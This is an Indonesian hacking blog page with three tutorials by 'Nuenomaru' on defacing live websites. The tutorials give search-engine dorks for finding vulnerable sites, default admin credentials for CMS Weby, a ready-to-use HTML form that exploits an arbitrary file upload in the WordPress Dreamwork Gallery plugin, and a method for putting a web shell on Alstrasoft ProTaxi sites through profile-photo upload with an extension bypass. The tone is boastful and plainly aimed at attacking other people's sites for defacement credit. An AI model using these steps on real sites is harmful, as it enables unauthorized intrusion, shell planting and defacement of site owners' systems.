Tampilkan postingan dengan label Keamanan Website. Tampilkan semua postingan
Tampilkan postingan dengan label Keamanan Website. Tampilkan semua postingan

Minggu, 09 Juli 2017

Admin Default CMS Weby Shell Upload


Hello World; Malaam Fans, Please Say Hello Haters ;*
begimane kabar lu pade ? akwkawkwa masih tetep jomblo kan xD wkwkwkw.
hahaha, dah Lamaaaaaa banget guaaa gak ngeBlog >,<" , sampe lupa ini cara ngetik artikel tutorial yang asik dan gak garing gimana (biasanya juga garing asuw).
ampee lupa juga cara login blog gimana awkkwakwakkwakwa.
artikel sebelumnya titipan sodara Dumay gua si bang pu.sh yang judulnya Tutorial Deface dengan Bypass Admin CMS Biz1m.com Shell Upload .
untuk sekarang gua dititipin tutor yg mungkin masih HOT juga dari Sodara Dumay gua, yaitu bang Mrcareless .
yups kali ini Tutorial Deface dengan Admin Default CMS Weby Shell Upload .


Dork : 
intext:WebyBackOffice
(kembangin lagi, biar bisa dapet yang vuln n verawan)
Admin page : /login.php
Exploit Default CMS Weby:
user: iweb
pass: iweb.mt

1. Search target menggunakan dork diatas atau kalian bisa mengembangkan dork tersebut untuk mendapatkan hasil yg fresh
2. jika sudah pilih 1 web target, dan di alamat website tambahin login.php
   ex : www.site.co.li/login.php

jika ragu utk letak page loginnya, ketikan admin saja pada web target, nanti akan redirect sendiri ke halaman login
3. Muncul Page Login Adminnya


4. Masukan Username dan Password Default Login CMS Weby


5. jika sukses akan masuk dashboard


6. jika gagal akan 403
7. setelah masuk klik di menu admin ngasal aja nanti jumpa tempat upload (untuk tempat upload di setiap site berbeda, disarankan untuk memakai otak sendiri untuk mencari tempat uploadnya :p )


8. upload shell 
9. klik kanan " open image image in new tab " pada shell yang tadi Lu upload


untuk sejauh ini upload shell tak perlu bypass ekstensi atau pun repot2 make tamper xD.
silahkan eXplore sendiri nih eXploit :p , kembangin lagi yaps

NB : Jika ingin melakukan patching, diharapkan jangan gblk, jangan page login admin di deface, kita belajar bersama disini :) -pu.sh

owh iya, Bila ada Link atau gambar pada Artikel Blog ini ada yang rusak/Mati, harap lapor disini

Stay Cool and Keep ./Crotz , gaes <(")

bila ada kesalahan mohon di maafkan dan dibenarkan di kolom komentar kak.
bila ada kritik, dan pertanyaan langsung aja kak ke wall fanspage kami: TKJ CYBER ART
Nue cuma niat untuk Share Tutorial, yg bertujuan utk membantu para pemula kek Nue :')
Sekian dan semoga bermanfaat .. terimakasih

Thanks to: Mrcareless

./Nuenomaru

Dan gue tertawa melihat para Hacker Pembual Mulai Bermunculan





Visit and follow :

FP         : TKJ Cyber Art

G+         : TKJ Cyber Art
youtube : TKJ Cyber Art
BBM      : C0018D1A2
Line       : http://line.me/ti/p/%40hjl8740i

Kamis, 06 April 2017

eXploit Dreamwork Gallery File Upload Vulnerability


Hello World; Soree Fans, Please Say Hello Haters ;*
apa Kabs ? Lanjut Blogwalking Om. akwkwa, maap2 lagi sibuk nulis ebook sama nulis SFTH, sembari donlod2 JAV uncensored sih :v #aanjaey xD awkkwa
seduh kopi dulu biar sans kale xD , okei kali ini Gue Bakal Share salah satu eXploit yang ada pada CMS WordPress.
ini merupakan salah satu Bug/Celah yang ada pada CMS berlogo W Biru >..< *suka2aingmhanx*

Yupz kali ini gue bakal Share Tutorial Deface Website BerCMS WordPress dengan eXploit Dreamwork Gallery File Upload Vulnerability .
Gua gak tau persis ye ini eXploit baru atau Lawas, soalnya gua muter2 barat ampe timur gak nemu yg bisa di sodok make Shell :3 udh Bypass ekstensi masih gagal.
kalo mao liat yang berhasil upload Shell cek di Source ya :) , karena utk kali ini gua cuma Upload Script dipesan saja :')

Lanjut intip tutorial


Dork :
inurl:/wp-content/plugins/wp-dreamworkgallery/
(gunakan imajinasi vokepers lu, biar dapet yg vuln n verawan)

1. Dorking menggunakan Search Engine
2. pilih salah satu web yg pen ditusb0l, Masukin ke Script Uploader dibawah

3. Copy Script dibawah:

<form action="www.target.c0li/[path]/wp-admin/admin.php?page=dreamwork_manage" method="POST" enctype="multipart/form-data"> <input type="hidden" name="task" value="drm_add_new_album" /> <input type="hidden" name="album_name" value="Arbitrary File Upload" /> <input type="hidden" name="album_desc" value="Arbitrary File Upload" /> <input type="file" name="album_img" value="" /> <input type="submit" value="Submit" /> </form>

*ganti target.c0li dengan target yg pen lu tusbol
*[path] = sesuaikan dgn target lu, ye kalo gak ada pathnya langsung masukin aja eXploitnya
*save dengan ekstensi .html = contoh.html

4. Masukin Shell/File yang pengen Lu Upload

kek yg tadi gua bilang, gua upload script dipesan langsung

5. nah langsung Muncul deh Letak Shell/File yang tadi udeh lu upload.
tinggal lu cek aja


#BooM~

Shell/File Akses: /wp-content/uploads/dreamwork/randomangka_uploadfolder/big/namafilelu
dah ye, simpel kan ? intinye pinter2 lu Dorking dan eksekusi aja hehhe.
lanjutin deh, lu eXplore dewek nih eXploit & Bug (y) , moga membantu lu ye . ya minimal buat Refrensi aja awkkwaka xD

owh iya, Bila ada Link atau gambar pada Artikel Blog ini ada yang rusak/Mati, harap lapor disini

Stay Cool and Keep ./Crotz , gaes <(")

bila ada kesalahan mohon di maafkan dan dibenarkan di kolom komentar kak.
bila ada kritik, dan pertanyaan langsung aja kak ke wall fanspage kami: TKJ CYBER ART
Nue cuma niat untuk Share Tutorial, yg bertujuan utk membantu para pemula kek Nue :')
Sekian dan semoga bermanfaat .. terimakasih

Source and Thanks to: xhac.kerr

./Nuenomaru


Lo Hebat soal Mencari Celah, tapi Maaf Attitude masih Lemah





Visit and follow :

FP         : TKJ Cyber Art
G+         : TKJ Cyber Art
youtube : TKJ Cyber Art
BBM      : C0018D1A2
Line       : http://line.me/ti/p/%40hjl8740i

Sabtu, 01 April 2017

eXploit Alstrasoft ProTaxi Enterprise 3.5 - Arbitrary File Upload

cuma gue yg berani nyoret2 tembok suzuran :v

Hello World; Soree Fans, Please Say Hello Haters ;*
Maaf gak terlalu Rutin update Tutorial yak >.<, lg sibuk Menjalani Hidup akwkwak.
tapi artikel kali ini bakal Bahas eXploit & Bug baru nih, Bug kali ini simpel kok, cuma Manfaatin Register, yang dah master Minggir dulu :p
yupz gua bakal Share Tutorial Deface dengan eXploit Alstrasoft ProTaxi Enterprise 3.5 - Arbitrary File Upload .

Lanjut intip Tutorial


Dork:
inurl:/user/signin intext:SIGN IN NOW
inurl:public/user/signup
(gunakan imajinasi vokepers lu, biar dapet yg vuln n verawan)

1. Dorking menggunakan Search Engine
2. pilih salah satu web yg pen ditusb0l, pokoknya cari form Register, biasanya sih Klik Sign in dulu, baru Klik "Create an account" .

3. Vulnerability ~ Muncul Form REGISTER


4. Isi Form Sesuka elu, tapi email dan password ingetin, soalnya utk nanti Sign In , kalo udah lu isi semua Klik REGISTER .
5. Jika sukses Register Muncul Notice: You have successfully registered. Please Login
6. Langsung lu login make email dan password yang tadi lu Daftar


7. setelah login akan muncul kek gambar di bawah , lalu Klik Profile


8. dibagian Photo upload File/Shell lu, ekstensi trgantung target.
kalo .php gagal, langsung Bypass ekstensi nya aja om, gua disini bypass ekstensi shell gua jadi: .phtml
kalo smua ekstensi dah lu cobain dan tetep gagal, coba di tampar aja om biar merah awkwakwka.


9. kalo sudah Klik Update Profile / Upload
10. setelah upload muncul gambar rusak tinggal open link new tab aja .



11. Bisa juga pencet CTRL + U , cari Shell Lu (ctrl + f), carinya sesuai ekstensi shell lu Om.
disini gua .phtml , soalnya shell namanya bakalan jadi Random ^_^


#BooM~ , Muncul deh Shell kesayangan elu xD akkwakwak



awkkwakaw, dah dulu ye di mari ujan ngeri kesamber gua  >.<"
utk selebihnya Lu eXplore sendiri aja ye akwkwa xD.
lumayan buat Dispenser2 yang pen Punya History banyak di google/ yang push up rank team di Mirror :v xD awkkawk *ngakak*

owh iya, Bila ada Link atau gambar pada Blog ini ada yang rusak/Mati, harap lapor disini

Stay Cool and Keep ./Crotz , gaes <(")

bila ada kesalahan mohon di maafkan dan dibenarkan di kolom komentar kak.
bila ada kritik, dan pertanyaan langsung aja kak ke wall fanspage kami: TKJ CYBER ART
Nue cuma niat untuk Share Tutorial, yg bertujuan utk membantu para pemula kek Nue :')
Sekian dan semoga bermanfaat .. terimakasih

Source and Thanks to: exploit-DB

./Nuenomaru

Jangan NgeJudge Bila Lu bukan Juri, diamlah sejenak COBA PIKIR LAGI




Visit and follow :

FP         : TKJ Cyber Art
G+         : TKJ Cyber Art
youtube : TKJ Cyber Art
BBM      : C0018D1A2
Line       : http://line.me/ti/p/%40hjl8740i

 

ande ande lumoet Template by Ipietoon Cute Blog Design